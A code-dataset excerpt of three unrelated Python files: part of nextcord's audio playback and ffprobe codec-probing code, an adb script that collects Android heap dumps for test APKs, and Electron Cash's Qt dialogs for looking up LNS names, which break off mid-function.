self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self._call_after()
self.source.cleanup()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
# Run the after function
after_return = self.after(error)
# If what we got back was a coroutine, submit it to
# the main event loop for processing
if asyncio.coroutines.iscoroutine(after_return):
asyncio.run_coroutine_threadsafe(after_return, self.client.loop)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
AutoDump.py | import os
import ConstResource as Res
import FunctionCommon as Fun
import FunctionPackage as FunPkg
import FunctionLauncher as FunLch
import GrabDump as Grab
from threading import Thread
debug = True
pkg_list = ['35711', '50003']
collect_period = 5 * 60 if debug else 5 * 60 * 60 # 5 hour
collect_info_internal = 60 if debug else 30 * 60 # 30 min
collect_times = 2 if debug else 10 - 1 # collect_period / collect_info_internal
def main_process():
devices = Fun.devices_list_with_connection_check()
for dev in devices:
Thread(target=collect_dump_info, args=(dev,)).start()
def collect_dump_info(dev):
Fun.log('start thread for device:' + dev)
path = make_device_tag_dir(dev)
for apk in pkg_list:
inspect_apk_dump_with_internal(apk, dev, path)
def inspect_apk_dump_with_internal(apk, dev, path):
refresh_with_apk(dev, apk)
collect_info_repeat_with_fixed_rate(apk, dev, path)
def collect_info_repeat_with_fixed_rate(apk, dev, path):
for i in range(collect_times):
information_collection(apk, dev, path)
Fun.sleep(collect_info_internal)
def refresh_with_apk(dev, apk_tag):
FunPkg.uninstall_and_install(dev, os.path.join(Res.apk_path, apk_tag + Res.pgk_suffix),
Res.pkg_name)
FunLch.start_launcher_omit_splash(dev)
def information_collection(apk_tag, dev, path):
Fun.log('trigger gc')
absolute_tmp_dump_path = os.path.realpath(path)
Fun.p_open(Res.adb_grab_heap_dump_file_with_pkg(dev, absolute_tmp_dump_path, Res.pkg_name))
Fun.sleep(10)
lines = Fun.p_open(Res.asb_shell_dump_mem_info(dev)).readlines()
name = apk_tag + Res.dump + Fun.current_time()
dump_mem_info_store_to_file(name, lines, path)
Grab.grab_dump_and_convert(dev, name, absolute_tmp_dump_path, Res.pkg_name)
def dump_mem_info_store_to_file(name, lines, path):
file_path = os.path.join(path, name + Res.txt_suffix)
if not os.path.exists(file_path):
Fun.p_open('touch ' + file_path)
Fun.write_lines_into_file(file_path, lines)
def make_device_tag_dir(d):
model, bluetooth = Fun.parse_device_model_and_bluetooth(d)
path = os.path.join(Res.output_path, model + Res.underline + bluetooth)
Fun.make_dir_if_not_exist(path)
return path
main_process()
|
lnsqt.py | ##!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Electron Cash - A Bitcoin Cash SPV Wallet
# This file Copyright (c) 2019 Calin Culianu <calin.culianu@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
'''
LNS related classes and functions - Qt UI related.
'''
# TODO: whittle these * imports down to what we actually use
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from .util import *
from .qrcodewidget import QRCodeWidget
import queue
import time
import requests
from typing import Tuple, List, Callable
from enum import IntEnum
from electroncash import lns
from electroncash import util
from electroncash import web
from electroncash.address import Address
from electroncash.i18n import _, ngettext
from electroncash.wallet import Abstract_Wallet
class VerifyingDialog(WaitingDialog):
def __init__(self, parent, message, task, on_success=None, on_error=None, auto_cleanup=True,
*, auto_show=True, auto_exec=False, title=None, disable_escape_key=False):
main_thread_success_cb = lambda x: util.do_in_main_thread(on_success, x) if on_success else None
main_thread_error_cb = lambda x: util.do_in_main_thread(on_error, x) if on_error else None
super().__init__(parent, message, task, on_success=main_thread_success_cb,
on_error=main_thread_error_cb, auto_cleanup=auto_cleanup,
auto_show=False, auto_exec=False,
title=title or _('Verifying LNS Name'),
disable_escape_key=disable_escape_key)
hbox = QHBoxLayout()
self._vbox.removeWidget(self._label)
icon_lbl = QLabel()
icon_lbl.setPixmap(QIcon(":icons/lns.png").pixmap(50))
hbox.addWidget(icon_lbl)
hbox.addWidget(self._label)
self._vbox.addLayout(hbox)
prog = QProgressBar()
prog.setRange(0,0)
self._vbox.addWidget(prog)
if auto_show and not auto_exec:
self.open()
elif auto_exec:
self.exec_()
destroyed_print_error(self)
def verify_multiple_names(names : List[str], parent : MessageBoxMixin, wallet : Abstract_Wallet, timeout=10.0) -> int:
''' Pass a list of names and will attempt to verify them all in 1 pass.
This is used by the Contacts tab to verify unverified LNS Names that
may have been imported. Returns the number of successfully verified names
or None on user cancel. '''
if not len(names):
return 0
names = set(names)
nnames = len(names)
q = queue.Queue()
def done_cb(thing):
if isinstance(thing, (Exception, list)):
q.put(thing)
else:
q.put(None)
ctr = 0
def thread_func():
nonlocal ctr
wallet.lns.verify_name_asynch(name=names, success_cb=done_cb, error_cb=done_cb, timeout=timeout)
errs = 0
while ctr + errs < nnames:
try:
thing = q.get(timeout=timeout)
if thing is None:
errs += 1
elif isinstance(thing, Exception):
raise thing
else:
ctr += len(thing)
except queue.Empty:
return
code = VerifyingDialog(parent.top_level_window(),
ngettext("Verifying {count} name please wait ...",
"Verifying {count} names please wait ...", nnames).format(count=nnames),
thread_func, auto_show=False, on_error=lambda e: parent.show_error(str(e))).exec_()
if code != QDialog.Accepted:
return None
return ctr
def resolve_lns(parent : MessageBoxMixin, name : str, wallet : Abstract_Wallet = None) -> Tuple[lns.Info, str]:
''' Throws up a WaitingDialog while it resolves an LNS Name.
Goes out to network, verifies the name.
Returns: a tuple of: (Info, lns_name)
Argument `name` should be an LNS Name string of the form:
satoshi.bch
On failure throws up an error window and returns None.'''
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
class Bad(Exception): pass
try:
lns_tup = wallet.lns.parse_string(name)
if not lns_tup:
raise Bad(_("Invalid LNS Name specified: {name}").format(name=name))
results = None
def resolve_verify():
nonlocal results
results = wallet.lns.resolve_verify(name)
results = [(item,item.name) for item in results]
code = VerifyingDialog(parent.top_level_window(),
_("Verifying LNS Name {name} please wait ...").format(name=name),
resolve_verify, on_error=lambda e: parent.show_error(str(e)), auto_show=False).exec_()
if code == QDialog.Rejected:
# user cancel operation
return
if not results:
raise Bad(_("LNS Name not found: {name}").format(name=name) + "\n\n"
+ _("Could not find the LNS Name specified. "
"It either does not exist or there may have been a network connectivity error. "
"Please double-check it and try again."))
if len(results) > 1:
tup = multiple_result_picker(parent=parent, wallet=wallet, results=results)
if not tup:
# user cancel
return
results = [tup]
info, _name = results[0]
name = wallet.lns.fmt_info(info)
if not isinstance(info.address, Address):
raise Bad(_("Unsupported payment data type.") + "\n\n"
+ _("The LNS Name {name} uses an account type that "
"is not supported by Electron Cash.").format(name=name))
return info, info.name
except Bad as e:
parent.show_error(str(e))
return None
class ButtonAssociatedLabel(QLabel):
''' A QLabel, that if clicked on, sends a 'click()' call to an associated
QAbstractButton. '''
def __init__(self, *args, **kwargs):
but = kwargs.pop('button', None)
super().__init__(*args, **kwargs)
self.but = but
self.setTextInteractionFlags(self.textInteractionFlags() | Qt.TextSelectableByMouse)
def setButton(self, b : QAbstractButton): self.but = b
def button(self) -> QAbstractButton: return self.but
def mouseReleaseEvent(self, e):
super().mouseReleaseEvent(e)
if self.but:
if self.but.isEnabled():
self.but.click()
elif self.but.toolTip() and not self.hasSelectedText():
QToolTip.showText(QCursor.pos(), self.but.toolTip(), self)
def naked_button_style() -> str:
''' Returns a stylesheet for a small 'naked' (flat) QPushButton button which
is used in the lookup results and other associated widgets in this file '''
but_style_sheet = 'QPushButton { border-width: 1px; padding: 0px; margin: 0px; }'
if not ColorScheme.dark_scheme:
but_style_sheet += ''' QPushButton { border: 1px solid transparent; }
QPushButton:hover { border: 1px solid #3daee9; }'''
return but_style_sheet
def button_make_naked(but: QAbstractButton) -> QAbstractButton:
''' Just applied a bunch of things to a button to "make it naked"
which is the look we use for the lookup results and various other odds and
ends. Returns the button passed to it. '''
but.setStyleSheet(naked_button_style())
but.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
return but
class InfoGroupBox(PrintError, QGroupBox):
class ButtonType(IntEnum):
NoButton = 0 # If this is specified to button_type, then the buttons will be hidden. selectedItem and selectedItems will have undefined results.
Radio = 1 # If specified, the on-screen buttons will be QRadioButtons and selectedItems() will always have 0 or 1 item.
CheckBox = 2 # If specified, the on-screen buttons will be QCheckBox and selectedItems() may be a list of more than 1 result
def __init__(self,
parent : QWidget, # widget parent for layout/embedding/etc
main_window : MessageBoxMixin, # may be same as 'parent'; will raise if not an ElectrumWindow instance
items: List[Tuple[lns.Info, str]] = [], # list of 1 or 2 tuple : Info[, formatted_string]
title : str = None,
button_type : ButtonType = ButtonType.Radio, # Note that if CheckBox, the buttonGroup will be made non-exclusive and selectedItems() may return more than 1 item.
extra_buttons : List[Callable[[Tuple[lns.Info, str]], QAbstractButton]] = [], # pass a list of callables that take a 2-tuple for each item and return a button
show_addresses : bool = True, # if False, the address label remains hidden
custom_contents_margins : Tuple[int] = None, # if specified, use this as the contents margins for the internal layout widget
):
from .main_window import ElectrumWindow
assert isinstance(main_window, ElectrumWindow)
super().__init__(parent)
self.main_window = main_window
self.wallet = self.main_window.wallet
self.extra_buttons = extra_buttons or []
self.show_addresses = bool(show_addresses)
if isinstance(custom_contents_margins, (tuple, list)) and len(custom_contents_margins) == 4 and all(isinstance(x, (int, float)) for x in custom_contents_margins):
self.custom_contents_margins = custom_contents_margins
else:
self.custom_contents_margins = None
assert isinstance(self.wallet, Abstract_Wallet)
self._setup()
self.setItems(items=items, title=title, auto_resize_parent=False, button_type=button_type)
def _setup(self):
self.w = QWidget(self)
self.vbox = QVBoxLayout(self)
self.vbox.setContentsMargins(0,0,0,0)
self.vbox.addWidget(self.w)
self._but_grp = QButtonGroup(self) # client code shouldn't use this but instead use selectedItems(), etc
self.no_items_text = _('No LNS Names') # client code may set this directly
def setItems(self,
items : List[Tuple[lns.Info, str]], # list of 1 or 2 tuple : Info[, formatted_string]
title = None, auto_resize_parent = True, sort=True,
button_type : ButtonType = ButtonType.Radio):
items = items or []
nitems = len(items)
title = ngettext("{number} LNS Name", "{number} LNS Names", nitems).format(number=nitems) if title is None else title
wallet = self.wallet
if items and (sort): #or len(items[0]) != 3):
# sort items by formatted LNS Name string, also adding the string to
# the items tuples; tuples now are modified to 2 elements:
# (info, formatted_ca_string)
formatter = lambda x: (x[0], wallet.lns.fmt_info(x[0]))
if sort:
items = sorted((formatter(x) for x in items), key=lambda tup:tup[1])
else:
items = [formatter(x) for x in items]
self._items = items
self.button_type = button_type
self.setTitle(title)
self.refresh()
if auto_resize_parent and self.parent():
weakParent = util.Weak.ref(self.parent())
QTimer.singleShot(0, lambda: weakParent() and weakParent().resize(weakParent().sizeHint()))
def buttonGroup(self) -> QButtonGroup:
''' The button group id's will point to indices in self.items() '''
return self._but_grp
def checkItemWithInfo(self, info : lns.Info):
''' Pass an info object and the item that corresponds to that
Info object will be checked. Pass None to uncheck all items. '''
for i, item in enumerate(self._items):
if info is None:
self._but_grp.button(i).setChecked(False)
elif item[0] == info:
self._but_grp.button(i).setChecked(True)
def items(self) -> List[Tuple[lns.Info, str]]:
''' The list of items on-screen. self.buttonGroup()'s ids will point
to indices in this list.
Returned list items are 2-tuples of:
(Info, fmtd_lns_name: str) '''
return self._items
def selectedItem(self) -> Tuple[lns.Info, str]:
''' Returns the currently selected item tuple or None if none is selected '''
items = self.selectedItems()
if items:
return items[0]
def selectedItems(self) -> List[Tuple[lns.Info, str]]:
''' In multi-select mode (CheckBox mode), returns the currently selected
items as a list of 2-tuple. '''
ret = []
buts = self._but_grp.buttons()
for but in buts:
if but.isChecked():
which = self._but_grp.id(but)
if which > -1 and which < len(self._items):
ret.append(self._items[which])
return ret
def refresh(self):
from .main_window import ElectrumWindow
parent = self.main_window
wallet = self.wallet
items = self._items
button_type = self.button_type
assert all(len(x) == 2 for x in items)
but_grp = self._but_grp
cols, col, row = 2, 0, -1
if self.w:
# save selection
saved_selection = [tup[0] for tup in self.selectedItems()]
# tear down the dummy container widget from before and everything
# in it
for c in self.findChildren(QAbstractButton, "InfoGroupBoxButton"):
if isinstance(c, QAbstractButton):
but_grp.removeButton(c)
self.w.hide()
self.vbox.removeWidget(self.w)
self.w.setParent(None)
self.w.deleteLater()
self.w = None
self.w = w = QWidget(self)
self.vbox.addWidget(w)
grid = QGridLayout(w)
if self.custom_contents_margins:
grid.setContentsMargins(*self.custom_contents_margins)
def details_link_activated(lnsstr):
if isinstance(parent, ElectrumWindow):
lns_detail_dialog(parent, lnsstr)
def view_addr_link_activated(addr):
if isinstance(parent, ElectrumWindow):
try:
address = Address.from_string(addr)
parent.show_address(address, parent=parent.top_level_window())
except Exception as e:
parent.print_error(repr(e))
# We do it this way with BUTTON_FACTORY in case we want to expand
# this facility later to generate even more dynamic buttons.
if button_type == __class__.ButtonType.CheckBox:
BUTTON_FACTORY = lambda *args: QCheckBox()
but_grp.setExclusive(False)
else:
BUTTON_FACTORY = lambda *args: QRadioButton()
but_grp.setExclusive(True)
hide_but = button_type == __class__.ButtonType.NoButton
grid.setVerticalSpacing(4)
if not items:
label = WWLabel("<i>" + self.no_items_text + "</i>")
label.setAlignment(Qt.AlignCenter)
grid.addWidget(label, 0, 0, -1, -1)
for i, item in enumerate(items):
col = col % cols
if not col:
row += 1
info, lns_string = item
lns_string_em = info.name
# Radio button (by itself in colum 0)
rb = BUTTON_FACTORY(info, "", lns_string, lns_string_em)
rb.setObjectName("InfoGroupBoxButton")
rb.setHidden(hide_but)
rb.setDisabled(hide_but) # hidden buttons also disabled to prevent user clicking their labels to select them
is_valid = True
is_mine = False
is_change = False
assert isinstance(info.address, Address)
if wallet.is_mine(info.address):
is_mine = True
is_change = wallet.is_change(info.address)
but_grp.addButton(rb, i)
grid.addWidget(rb, row*3, col*5, 1, 1)
pretty_string = lns_string
# LNS Name
lns_lbl = ButtonAssociatedLabel(f'<b>{pretty_string}</b>', button=rb)
grid.addWidget(lns_lbl, row*3, col*5+1, 1, 1)
# Details
details = _("Details")
details_lbl = WWLabel(f'<font size=-1><a href="{lns_string}">{details}...</a></font>')
details_lbl.setToolTip(_("View Details"))
grid.addWidget(details_lbl, row*3, col*5+2, 1, 1)
# misc buttons
hbox = QHBoxLayout()
hbox.setContentsMargins(0,0,0,0)
hbox.setSpacing(4)
for func in self.extra_buttons:
if callable(func):
ab = func(item)
if isinstance(ab, QAbstractButton):
button_make_naked(ab)
hbox.addWidget(ab)
# copy button
copy_but = QPushButton(QIcon(":icons/copy.png"), "")
button_make_naked(copy_but)
hbox.addWidget(copy_but)
grid.addLayout(hbox, row*3, col*5+3, 1, 1)
# end button bar
if isinstance(parent, ElectrumWindow):
details_lbl.linkActivated.connect(details_link_activated)
copy_but.clicked.connect(lambda ignored=None, name=lns_string_em, copy_but=copy_but:
parent.copy_to_clipboard(text=name, tooltip=_('LNS Name copied to clipboard'), widget=copy_but) )
copy_but.setToolTip('<span style="white-space:nowrap">'
+ _("Copy <b>{text}</b>").format(text=lns_string_em)
+ '</span>')
else:
details_lbl.setHidden(True)
copy_but.setHidden(True)
if self.show_addresses:
addr_lbl = ButtonAssociatedLabel('', button=rb)
if is_valid:
if is_mine:
addr_lbl.setText(f'<a href="{info.address.to_ui_string()}"><pre>{info.address.to_ui_string()}</pre></a>')
addr_lbl.linkActivated.connect(view_addr_link_activated)
addr_lbl.setToolTip(_('Wallet') + ' - ' + (_('Change Address') if is_change else _('Receiving Address')))
addr_lbl.setButton(None) # disable click to select
else:
addr_lbl.setText(f'<pre>{info.address.to_ui_string()}</pre>')
else:
addr_lbl.setText('<i>' + _('Unsupported Account Type') + '</i>')
addr_lbl.setToolTip(rb.toolTip())
grid.addWidget(addr_lbl, row*3+1, col*5+1, 1, 3)
if (col % cols) == 0:
# insert stretch in between the two columns
spacer = QSpacerItem(1,0)
grid.addItem(spacer, row, col*5+4, 1, 1)
grid.setColumnStretch(col*5+4, 10)
if self.show_addresses:
# in-between row spaer. Only added if showing addresses
# to make the address line visually closer to the line above it
spacer = QSpacerItem(1, 8)
grid.addItem(spacer, row*3+2, col*5, 1, 4)
col += 1
if len(items) == 1:
# just 1 item, put it on the left
grid.addItem(QSpacerItem(2,1), 0, 5)
grid.setColumnStretch(5, 100)
if len(items) <= 2:
# just 1 row, push it up to the top
grid.addItem(QSpacerItem(1,2), 3, 0, -1, -1)
grid.setRowStretch(3, 100)
if saved_selection and self.button_type != self.ButtonType.NoButton:
for info in saved_selection:
self.checkItemWithInfo(info)
else:
self.checkItemWithInfo(None)
def multiple_result_picker(parent, results, wallet=None, msg=None, title=None, gbtext=None):
''' Pops up a modal dialog telling you to pick a results. Used by the
Contacts tab edit function, etc. '''
assert parent
from .main_window import ElectrumWindow
if isinstance(parent, ElectrumWindow) and not wallet:
wallet = parent.wallet
assert isinstance(wallet, Abstract_Wallet)
msg = msg or _('Multiple results were found, please select an option from the items below:')
title = title or _("Select LNS Name")
d = WindowModalDialog(parent, title)
util.finalization_print_error(d) # track object lifecycle
destroyed_print_error(d)
vbox = QVBoxLayout(d)
lbl = WWLabel(msg)
vbox.addWidget(lbl)
gb = InfoGroupBox(d, parent, results)
vbox.addWidget(gb)
ok_but = OkButton(d)
buts = Buttons(CancelButton(d), ok_but)
vbox.addLayout(buts)
ok_but.setEnabled(False)
but_grp = gb.buttonGroup()
but_grp.buttonClicked.connect(lambda x=None: ok_but.setEnabled(gb.selectedItem() is not None))
code = d.exec_()
if code == QDialog.Accepted:
item = gb.selectedItem()
if item:
return item[:-1]
def lookup_lns_dialog(
parent, wallet, *, # parent and wallet are required and parent must be an ElectrumWindow instance.
title: str = None, # the title to use, defaults to "Lookup LNS Name" (translated) and is bold and larger. Can be rich text.
blurb: str = None, # will appear in the same label, can be rich text, will get concatenated to title.
title_label_link_activated_slot: Callable[[str], None] = None, # if you embed links in the blub, pass a callback to handle them
button_type: InfoGroupBox.ButtonType = InfoGroupBox.ButtonType.NoButton, # see InfoGroupBox
add_to_contacts_button: bool = False, # if true, the button bar will include an add to contacts button
pay_to_button: bool = False # if true, the button bar will include a "pay to" button
) -> List[Tuple[lns.Info, str, str]]: # Returns a list of tuples
''' Shows the generic LNS Name lookup interface. '''
from .main_window import ElectrumWindow
ok_disables = button_type != InfoGroupBox.ButtonType.NoButton
title = title or _("Lookup LNS Name")
blurb = blurb or ''
assert isinstance(parent, ElectrumWindow) and isinstance(wallet, Abstract_Wallet)
if parent.gui_object.warn_if_no_network(parent):
return None
d = WindowModalDialog(parent.top_level_window(), title)
d.setObjectName("WindowModalDialog - " + title)
finalization_print_error(d)
destroyed_print_error(d)
all_lns_contacts = set(contact.name for contact in wallet.contacts.get_all(nocopy=True) if contact.type == 'lns')
vbox = QVBoxLayout(d)
hbox = QHBoxLayout()
label = QLabel()
label.setPixmap(QIcon(":icons/lns.png").pixmap(50))
hbox.addWidget(label)
hbox.addItem(QSpacerItem(10, 1))
label = QLabel("<font size=+1><b>" + title + "</b></font>" + blurb)
if callable(title_label_link_activated_slot):
label.linkActivated.connect(title_label_link_activated_slot)
label.setAlignment(Qt.AlignVCenter|Qt.AlignLeft)
hbox.addWidget(label)
hbox.addStretch(2)
vbox.addLayout(hbox)
grid = QGridLayout()
grid.setContentsMargins(62, 32, 12, 12)
acct = QLineEdit()
acct.setPlaceholderText(_("LNS Name e.g. satoshi.bch"))
acct.setMinimumWidth(280)
label2 = WWLabel('<a href="https://app.bch.domains">' + _("Search online...") + "</a>")
label2.linkActivated.connect(webopen)
#acct.setFixedWidth(280)
label = HelpLabel(_("&LNS Name"), _("Enter an LNS Name of the form satoshi.bch, and Electron Cash will search for the contact and present you with its resolved address."))
label.setBuddy(acct)
search = QPushButton(_("Lookup"))
search.setEnabled(False)
grid.addWidget(label, 0, 0, 1, 1, Qt.AlignRight)
grid.addWidget(acct, 0, 1, 1, 1, Qt.AlignLeft)
grid.addWidget(search, 0, 2, 1, 1, Qt.AlignLeft)
grid.addWidget(label2, 0, 3, 1, 1, Qt.AlignLeft)
grid.setColumnStretch(3, 5)
vbox.addLayout(grid)
vbox.addItem(QSpacerItem(20,10))
frame = QScrollArea()
tit_lbl = QLabel()
vbox.addWidget(tit_lbl)
extra_buttons = []
# Extra Buttons
if add_to_contacts_button:
def create_add_to_contacts_button_callback(item: tuple) -> QPushButton:
info, lns_string = item
lns_string_em = wallet.lns.fmt_info(info)
but = QPushButton(QIcon(":icons/tab_contacts.png"), "")
if isinstance(info.address, Address):
if lns_string not in all_lns_contacts and wallet.is_mine(info.address):
# We got a result for an LNS that happens to be ours. Remember it.
parent.set_contact(label=lns_string, address=info.address, typ='lns')
all_lns_contacts.add(lns_string)
if lns_string in all_lns_contacts:
but.setDisabled(True)
